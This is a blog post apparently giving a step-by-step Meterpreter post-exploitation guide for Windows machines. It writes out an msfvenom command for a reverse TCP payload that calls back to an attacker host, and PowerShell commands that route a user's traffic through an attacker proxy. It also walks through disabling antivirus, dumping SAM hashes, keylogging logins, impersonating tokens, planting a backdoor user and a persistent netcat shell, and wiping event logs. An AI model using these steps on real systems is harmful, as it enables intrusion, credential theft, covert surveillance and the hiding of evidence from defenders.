Meterpreter Basics

Image result for meterpreter logo

Meterpreter is a very powerful payload that can be dropped whilst using an exploit in Metasploit. Once obtained, there is quite a lot that you can do.

To find out more about Meterpreter, click the link below. This site also has examples on how to use the modules if you want to learn more.

https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/

There are multiple ways to obtain a Meterpreter shell but because this is an example, I can simply run the exploit. To created the payload lets use msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.1.158 LPORT=4444 -o /home/parrot/parrot.exe

Once ran, we can run the following…

Migrate

The first thing we should do is migrating over to a stable service. This is to keep our session live so we need to chose a service such as Explorer.exe or Svchost.exe.
To list the current services, run ps

To migrate, use migrate [PID]

Kill the AV

You might have gotten lucky with the AV however it may still be functioning. Turning it off will allow you to run further modules. You can use run killav or if you have system32 or admin access, run commands through an admin shell.

For example, Symantec: smc -stop whilst Defender is disabled by a registry key. Running enum_applications or checking running services will show you what AV is running. If not, ‘Program Files’ always helps.

Check Applications

You will want to see what the device is running. This could be the answer to exploiting the machine further.

Download Files

If you are wanting to “Obtain” files, you can use the download to copy the files locally. You may need to use two “\” when passing the directory (C:\\Temp)

SAM Database

If we want to steal the user’s passwords, we could dump the SAM DB and crack them. If this fails at first, you will need to escalate to system32, by running use priv and getsystem

Once elevated, you will see the hashes…

You could also use: run post/windows/gather/credentials/credential_collector

Check Logged On Users

If you are wanting to see who’s currently working.

Create user

Creating backdoors are a great way to maintain access. You may want to create your own user to access this.

To remove the user, run the command list above: run multi_console…….

Start A Shell

If you want to interact with all of windows features, you may need a shell.

You can then start to create space for yourself, such as your own hidden folder:

Even if you don’t have admin rights, you can still modify the device as a ‘user’. For instance, once you have loaded a shell, transfer over to Powershell. Once in Powershell, you can set the following to proxy the users traffic:

Get-ItemProperty -Path ‘HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings’ | Select-Object ProxyServer, ProxyEnable   

Set-ItemProperty -Path ‘HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings’ -name ProxyServer -Value “172.168.1.1:8080”

Set-ItemProperty -Path ‘HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings’ -name ProxyEnable -Value 1

For HTTPS, you will need to install your proxy certificate.

Upload Files

If you have your own area or you are trying to replace files with malicious ones, upload can help.

Remember, you need two “\\” when entering the destination path.

Screenshot

If you want to see what the user is currently doing, screenshot can help.

Running Enumeration

Running multiple commands can take time. Winenum can complete all of this for you.

Show Shares

There may be open shares on the device.

Keylogger

Recording key strokes is a way of obtaining useful information such as username and passwords.

You will need to be on the correct service to capture what you need. If you want to capture keystrokes during login, you will need to migrate to the winlogon services.

Go Incognito

Masking activity is key in certain situations so hiding in plain sight could be for the best. If the computer has multiple users, why not be one.
File transfers running as system32 or admin, tend to stand out.

List the collected tokens of the users.

Impersonate that person

Persistent Netcat Shell

Having a constant session is hard to maintain. Especially once the user has rebooted. Maintaining access is your best option and a netcat shell works quite nicely. This is just a basic example, but you could use this method for anything.

First we have to have admin rights due to editing registry keys (getsystem). Then we can upload our executable which will be ran on start-up. To ensure this, we can add the below registry key. Depending on what you are doing, the port and command will change.

It’s wise to add a firewall rule, just to make sure. Try giving it a name that blends in.

Clearing Tracks

If you don’t mind the user knowing they have been hacked, you can simply wipe all the logs. For any IT person though, this would raise concerns.

If you wanted to delete certain logs, there are Powershell commands. For example, to view the last hour, run:

Once you find out the logs you need to remove, you can run the Clear-EventLog ….. command.

As you can see, it’s quite scary what can be done and it’s even more scarier that there are so many systems open to the internet. Vulnerabilities like Eternalblue can be exploited and pass these types of payloads. Exploiting vulnerabilities like this require no credentials by the way and can often give a shell running under system32.

Once in, a person can dominate your device or domain. You would be surprise what a person can do nowadays with a simple shell. This risk escalates when the user has admin credentials to the device/domain or the device itself can reach a domain controller.

https://ctrlaltdel.blog/2019/08/20/windows-shell-discovery-stage/

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s